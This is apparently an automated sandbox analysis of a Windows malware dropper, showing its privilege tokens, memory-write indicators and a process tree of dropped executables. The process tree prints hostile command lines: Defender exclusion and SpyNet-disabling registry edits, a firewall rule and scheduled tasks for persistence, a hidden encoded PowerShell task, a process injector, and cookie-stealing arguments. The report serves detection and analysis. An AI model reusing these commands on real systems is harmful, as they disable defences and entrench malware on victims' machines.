Token: SeUndockPrivilege	1816	Install.exe
Token: SeSyncAgentPrivilege	1816	Install.exe
Token: SeEnableDelegationPrivilege	1816	Install.exe
Token: SeManageVolumePrivilege	1816	Install.exe
Token: SeImpersonatePrivilege	1816	Install.exe
Token: SeCreateGlobalPrivilege	1816	Install.exe
Token: 31	1816	Install.exe
Token: 32	1816	Install.exe
Token: 33	1816	Install.exe
Token: 34	1816	Install.exe
Token: 35	1816	Install.exe
Token: SeDebugPrivilege	1536	SoCleanInst.exe
Token: SeDebugPrivilege	3420	taskkill.exe
Token: SeManageVolumePrivilege	872	md9_1sjm.exe
Token: SeDebugPrivilege	3400	Graphics.exe
Token: SeImpersonatePrivilege	3400	Graphics.exe
Token: SeShutdownPrivilege	2420
Token: SeCreatePagefilePrivilege	2420
Token: SeShutdownPrivilege	2420
Token: SeCreatePagefilePrivilege	2420
Token: SeManageVolumePrivilege	872	md9_1sjm.exe
Token: SeSystemEnvironmentPrivilege	3248	Graphics.exe
Token: SeShutdownPrivilege	2420
Token: SeCreatePagefilePrivilege	2420
Token: SeManageVolumePrivilege	872	md9_1sjm.exe
Token: SeShutdownPrivilege	2420
Token: SeCreatePagefilePrivilege	2420
Token: SeManageVolumePrivilege	872	md9_1sjm.exe
Token: SeSystemEnvironmentPrivilege	3156	csrss.exe
Token: SeManageVolumePrivilege	872	md9_1sjm.exe
Token: SeCreateTokenPrivilege	2896	XaysnQMF_r4AeDffJia5F3r6.exe
Token: SeAssignPrimaryTokenPrivilege	2896	XaysnQMF_r4AeDffJia5F3r6.exe
Token: SeLockMemoryPrivilege	2896	XaysnQMF_r4AeDffJia5F3r6.exe
Token: SeIncreaseQuotaPrivilege	2896	XaysnQMF_r4AeDffJia5F3r6.exe
Token: SeMachineAccountPrivilege	2896	XaysnQMF_r4AeDffJia5F3r6.exe
Token: SeTcbPrivilege	2896	XaysnQMF_r4AeDffJia5F3r6.exe
Token: SeSecurityPrivilege	2896	XaysnQMF_r4AeDffJia5F3r6.exe
Token: SeTakeOwnershipPrivilege	2896	XaysnQMF_r4AeDffJia5F3r6.exe
Token: SeLoadDriverPrivilege	2896	XaysnQMF_r4AeDffJia5F3r6.exe
Token: SeSystemProfilePrivilege	2896	XaysnQMF_r4AeDffJia5F3r6.exe
Token: SeSystemtimePrivilege	2896	XaysnQMF_r4AeDffJia5F3r6.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WerFault.exeXaysnQMF_r4AeDffJia5F3r6.exe

pid process

1256 WerFault.exe
2896 XaysnQMF_r4AeDffJia5F3r6.exe

pid	process
1256	WerFault.exe
2896	XaysnQMF_r4AeDffJia5F3r6.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exeFiles.exeInstall.execmd.exeGraphics.exesihclient.execsrss.exeFile.exe

description	pid	process	target process
PID 2900 wrote to memory of 1536	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	SoCleanInst.exe
PID 2900 wrote to memory of 1536	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	SoCleanInst.exe
PID 2900 wrote to memory of 872	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	md9_1sjm.exe
PID 2900 wrote to memory of 872	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	md9_1sjm.exe
PID 2900 wrote to memory of 872	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	md9_1sjm.exe
PID 2900 wrote to memory of 3124	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Folder.exe
PID 2900 wrote to memory of 3124	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Folder.exe
PID 2900 wrote to memory of 3124	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Folder.exe
PID 2900 wrote to memory of 3400	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Graphics.exe
PID 2900 wrote to memory of 3400	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Graphics.exe
PID 2900 wrote to memory of 3400	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Graphics.exe
PID 2900 wrote to memory of 2572	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Updbdate.exe
PID 2900 wrote to memory of 2572	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Updbdate.exe
PID 2900 wrote to memory of 2572	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Updbdate.exe
PID 2900 wrote to memory of 1816	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Install.exe
PID 2900 wrote to memory of 1816	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Install.exe
PID 2900 wrote to memory of 1816	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Install.exe
PID 2900 wrote to memory of 3280	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Files.exe
PID 2900 wrote to memory of 3280	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Files.exe
PID 2900 wrote to memory of 3280	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	Files.exe
PID 2900 wrote to memory of 3156	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	pub2.exe
PID 2900 wrote to memory of 3156	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	pub2.exe
PID 2900 wrote to memory of 3156	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	pub2.exe
PID 2900 wrote to memory of 384	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	File.exe
PID 2900 wrote to memory of 384	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	File.exe
PID 2900 wrote to memory of 384	2900	66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe	File.exe
PID 3280 wrote to memory of 2300	3280	Files.exe	jfiag3g_gg.exe
PID 3280 wrote to memory of 2300	3280	Files.exe	jfiag3g_gg.exe
PID 3280 wrote to memory of 2300	3280	Files.exe	jfiag3g_gg.exe
PID 1816 wrote to memory of 2096	1816	Install.exe	cmd.exe
PID 1816 wrote to memory of 2096	1816	Install.exe	cmd.exe
PID 1816 wrote to memory of 2096	1816	Install.exe	cmd.exe
PID 2096 wrote to memory of 3420	2096	cmd.exe	taskkill.exe
PID 2096 wrote to memory of 3420	2096	cmd.exe	taskkill.exe
PID 2096 wrote to memory of 3420	2096	cmd.exe	taskkill.exe
PID 3280 wrote to memory of 1088	3280	Files.exe	jfiag3g_gg.exe
PID 3280 wrote to memory of 1088	3280	Files.exe	jfiag3g_gg.exe
PID 3280 wrote to memory of 1088	3280	Files.exe	jfiag3g_gg.exe
PID 3248 wrote to memory of 2564	3248	Graphics.exe	sihclient.exe
PID 3248 wrote to memory of 2564	3248	Graphics.exe	sihclient.exe
PID 2564 wrote to memory of 4080	2564	sihclient.exe	netsh.exe
PID 2564 wrote to memory of 4080	2564	sihclient.exe	netsh.exe
PID 3248 wrote to memory of 3156	3248	Graphics.exe	csrss.exe
PID 3248 wrote to memory of 3156	3248	Graphics.exe	csrss.exe
PID 3248 wrote to memory of 3156	3248	Graphics.exe	csrss.exe
PID 3156 wrote to memory of 2412	3156	csrss.exe	injector.exe
PID 3156 wrote to memory of 2412	3156	csrss.exe	injector.exe
PID 384 wrote to memory of 3664	384	File.exe	dey0Iu8xI0ZErOCPX1EIEYmw.exe
PID 384 wrote to memory of 3664	384	File.exe	dey0Iu8xI0ZErOCPX1EIEYmw.exe
PID 384 wrote to memory of 1256	384	File.exe	WerFault.exe
PID 384 wrote to memory of 1256	384	File.exe	WerFault.exe
PID 384 wrote to memory of 1256	384	File.exe	WerFault.exe
PID 384 wrote to memory of 1916	384	File.exe	uiMkC2Ifbm1YLxnukMnuf5oW.exe
PID 384 wrote to memory of 1916	384	File.exe	uiMkC2Ifbm1YLxnukMnuf5oW.exe
PID 384 wrote to memory of 1916	384	File.exe	uiMkC2Ifbm1YLxnukMnuf5oW.exe
PID 384 wrote to memory of 2984	384	File.exe	rtXw62iIgg78mS7VFHjXjsN_.exe
PID 384 wrote to memory of 2984	384	File.exe	rtXw62iIgg78mS7VFHjXjsN_.exe
PID 384 wrote to memory of 2984	384	File.exe	rtXw62iIgg78mS7VFHjXjsN_.exe
PID 384 wrote to memory of 2160	384	File.exe	R6jV2lhcb309fzMlP_QT9DSZ.exe
PID 384 wrote to memory of 2160	384	File.exe	R6jV2lhcb309fzMlP_QT9DSZ.exe
PID 384 wrote to memory of 2160	384	File.exe	R6jV2lhcb309fzMlP_QT9DSZ.exe
PID 384 wrote to memory of 2896	384	File.exe	XaysnQMF_r4AeDffJia5F3r6.exe
PID 384 wrote to memory of 2896	384	File.exe	XaysnQMF_r4AeDffJia5F3r6.exe
PID 384 wrote to memory of 2896	384	File.exe	XaysnQMF_r4AeDffJia5F3r6.exe

C:\Users\Admin\AppData\Local\Temp\66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe
"C:\Users\Admin\AppData\Local\Temp\66cfbe5f490fe56ff4b06df0cdeab9677fa4d9c134483270e72b132c6a86df9e.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2900

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
PID:3124

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3400

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3248

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:2564

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:4080

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3156

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:388

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:2412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 972
4⤵
- Program crash
PID:1324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 988
3⤵
- Program crash
PID:3352

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:2572

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2096

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3420

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3280

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:2300

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1088

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:3156

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:384

C:\Users\Admin\Pictures\Adobe Films\dey0Iu8xI0ZErOCPX1EIEYmw.exe
"C:\Users\Admin\Pictures\Adobe Films\dey0Iu8xI0ZErOCPX1EIEYmw.exe"
3⤵
- Executes dropped EXE
PID:3664

C:\Users\Admin\Pictures\Adobe Films\FgS4_2xwzQJ0Iz_3pZJ9B9g_.exe
"C:\Users\Admin\Pictures\Adobe Films\FgS4_2xwzQJ0Iz_3pZJ9B9g_.exe"
3⤵
PID:1256

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:4164

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2252

C:\Users\Admin\Documents\Ix3TjjwSVrWLm5fi70KLSdDp.exe
"C:\Users\Admin\Documents\Ix3TjjwSVrWLm5fi70KLSdDp.exe"
4⤵
PID:1464

C:\Users\Admin\Pictures\Adobe Films\2y9JpPefvlA7XurFAdatRa4Q.exe
"C:\Users\Admin\Pictures\Adobe Films\2y9JpPefvlA7XurFAdatRa4Q.exe"
5⤵
PID:3632

C:\Users\Admin\Pictures\Adobe Films\_1PQqKhN2E1W5x5lOmQFRswz.exe
"C:\Users\Admin\Pictures\Adobe Films\_1PQqKhN2E1W5x5lOmQFRswz.exe"
5⤵
PID:5068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 616
6⤵
- Program crash
PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 624
6⤵
- Program crash
PID:3172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 656
6⤵
- Program crash
PID:2908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 800
6⤵
- Program crash
PID:4928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 872
6⤵
- Program crash
PID:2908

C:\Users\Admin\Pictures\Adobe Films\c0lO1QslqKcgjOcg_ei9hnwb.exe
"C:\Users\Admin\Pictures\Adobe Films\c0lO1QslqKcgjOcg_ei9hnwb.exe"
5⤵
PID:3492

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:524

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:4712

C:\Users\Admin\Pictures\Adobe Films\EHqfhhCHk62yuxKhfs_aiX0T.exe
"C:\Users\Admin\Pictures\Adobe Films\EHqfhhCHk62yuxKhfs_aiX0T.exe"
5⤵
PID:812

C:\Users\Admin\AppData\Local\Temp\7zS7533.tmp\Install.exe
.\Install.exe
6⤵
PID:4420

C:\Users\Admin\AppData\Local\Temp\7zS88FA.tmp\Install.exe
.\Install.exe /S /site_id "525403"
7⤵
PID:3584

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
8⤵
PID:2184

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
9⤵
PID:5204

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
10⤵
PID:5596

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
8⤵
PID:4912

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
9⤵
PID:5280

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
10⤵
PID:5332

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
10⤵
PID:5492

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gEqvjhVCK" /SC once /ST 01:27:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
8⤵
- Creates scheduled task(s)
PID:5344

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gEqvjhVCK"
8⤵
PID:5736

C:\Users\Admin\Pictures\Adobe Films\xdbFz812pGfhYw6QJeGkWZ19.exe
"C:\Users\Admin\Pictures\Adobe Films\xdbFz812pGfhYw6QJeGkWZ19.exe"
5⤵
PID:4112

C:\Users\Admin\Pictures\Adobe Films\DIxLZQ24gp8WyKwBY4fFvVDH.exe
"C:\Users\Admin\Pictures\Adobe Films\DIxLZQ24gp8WyKwBY4fFvVDH.exe"
5⤵
PID:4212

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\a6U_WGm.9B
6⤵
PID:4292

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
7⤵
PID:4312

C:\Users\Admin\Pictures\Adobe Films\rB7m12JH8N5ewPyhFtBw2B4p.exe
"C:\Users\Admin\Pictures\Adobe Films\rB7m12JH8N5ewPyhFtBw2B4p.exe"
5⤵
PID:3476

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
6⤵
PID:3972

C:\Users\Admin\AppData\Local\Temp\2GF66.exe
"C:\Users\Admin\AppData\Local\Temp\2GF66.exe"
7⤵
PID:4300

C:\Users\Admin\AppData\Local\Temp\80EG4.exe
"C:\Users\Admin\AppData\Local\Temp\80EG4.exe"
7⤵
PID:3184

C:\Users\Admin\AppData\Local\Temp\80EG4.exe
"C:\Users\Admin\AppData\Local\Temp\80EG4.exe"
7⤵
PID:1156

C:\Users\Admin\AppData\Local\Temp\7E63I470646AFJJ.exe
https://iplogger.org/1OAvJ
7⤵
PID:1616

C:\Users\Admin\AppData\Local\Temp\7E63I.exe
"C:\Users\Admin\AppData\Local\Temp\7E63I.exe"
7⤵
PID:1556

C:\Users\Admin\AppData\Local\Temp\2GF66.exe
"C:\Users\Admin\AppData\Local\Temp\2GF66.exe"
7⤵
PID:2668

C:\Users\Admin\AppData\Local\Temp\2GF66.exe
"C:\Users\Admin\AppData\Local\Temp\2GF66.exe"
7⤵
PID:1004

C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall23410.exe
"C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall23410.exe"
6⤵
PID:616

C:\Users\Admin\AppData\Local\Temp\781cc9ae-c78e-4e22-b556-c51c24093620.exe
"C:\Users\Admin\AppData\Local\Temp\781cc9ae-c78e-4e22-b556-c51c24093620.exe"
7⤵
PID:1720

C:\Users\Admin\AppData\Local\Temp\po50.exe
"C:\Users\Admin\AppData\Local\Temp\po50.exe"
6⤵
PID:1312

C:\Users\Admin\AppData\Local\Temp\cxy.exe
"C:\Users\Admin\AppData\Local\Temp\cxy.exe"
6⤵
PID:3492

C:\Users\Admin\AppData\Local\Temp\cxy.exe
"C:\Users\Admin\AppData\Local\Temp\cxy.exe" -h
7⤵
PID:1884

C:\Users\Admin\AppData\Local\Temp\tvstream17.exe
"C:\Users\Admin\AppData\Local\Temp\tvstream17.exe"
6⤵
PID:4128

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:1960

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:4664

C:\Users\Admin\AppData\Local\Temp\bcleaner.exe
"C:\Users\Admin\AppData\Local\Temp\bcleaner.exe"
6⤵
PID:3404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD1CB.tmp.bat""
7⤵
PID:4304

C:\Windows\system32\timeout.exe
timeout 5
8⤵
- Delays execution with timeout.exe
PID:2996

C:\ProgramData\BCleaner App\BCleaner Application.exe
"C:\ProgramData\BCleaner App\BCleaner Application.exe"
8⤵
PID:5436

C:\ProgramData\BCleaner App\BCleaner Umngr.exe
"C:\ProgramData\BCleaner App\BCleaner Umngr.exe"
8⤵
PID:5628

C:\Users\Admin\AppData\Local\Temp\jg1_1faf.exe
"C:\Users\Admin\AppData\Local\Temp\jg1_1faf.exe"
6⤵
PID:4244

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
6⤵
PID:4680

C:\Users\Admin\AppData\Local\Temp\is-UPVL4.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UPVL4.tmp\setup.tmp" /SL5="$202F2,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
7⤵
PID:4880

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
8⤵
PID:4360

C:\Users\Admin\AppData\Local\Temp\is-F0UDT.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F0UDT.tmp\setup.tmp" /SL5="$3027A,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
9⤵
PID:4112

C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
6⤵
PID:2416

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:4036

C:\Users\Admin\AppData\Local\Temp\inst200.exe
"C:\Users\Admin\AppData\Local\Temp\inst200.exe"
6⤵
PID:1816

C:\Users\Admin\AppData\Local\Temp\udontsay.exe
"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
6⤵
PID:2524

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
6⤵
PID:4464

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"
6⤵
PID:3700

C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
6⤵
PID:1832

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
7⤵
PID:5572

C:\Users\Admin\AppData\Local\Temp\is-DGSGA.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DGSGA.tmp\LzmwAqmV.tmp" /SL5="$3035A,140518,56832,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
8⤵
PID:5672

C:\Users\Admin\AppData\Local\Temp\anytime2.exe
"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
6⤵
PID:2780

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2780 -s 1932
7⤵
- Program crash
PID:5268

C:\Users\Admin\AppData\Local\Temp\anytime3.exe
"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
6⤵
- Executes dropped EXE
PID:3456

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3456 -s 1680
7⤵
- Program crash
PID:2960

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
6⤵
PID:4676

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4676 -s 1688
7⤵
- Program crash
PID:5456

C:\Users\Admin\Pictures\Adobe Films\uiMkC2Ifbm1YLxnukMnuf5oW.exe
"C:\Users\Admin\Pictures\Adobe Films\uiMkC2Ifbm1YLxnukMnuf5oW.exe"
3⤵
- Executes dropped EXE
PID:1916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 460
4⤵
- Program crash
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 468
4⤵
- Program crash
PID:4828

C:\Users\Admin\Pictures\Adobe Films\R6jV2lhcb309fzMlP_QT9DSZ.exe
"C:\Users\Admin\Pictures\Adobe Films\R6jV2lhcb309fzMlP_QT9DSZ.exe"
3⤵
- Executes dropped EXE
PID:2160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 476
4⤵
- Program crash
PID:4748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 468
4⤵
- Program crash
PID:4724

C:\Users\Admin\Pictures\Adobe Films\W6FAEXU1aolGezcjo9kj7gcR.exe
"C:\Users\Admin\Pictures\Adobe Films\W6FAEXU1aolGezcjo9kj7gcR.exe"
3⤵
PID:4448

C:\Users\Admin\Pictures\Adobe Films\ATOMu4Pz9VtYFn9QO4SD98Y4.exe
"C:\Users\Admin\Pictures\Adobe Films\ATOMu4Pz9VtYFn9QO4SD98Y4.exe"
3⤵
PID:4136

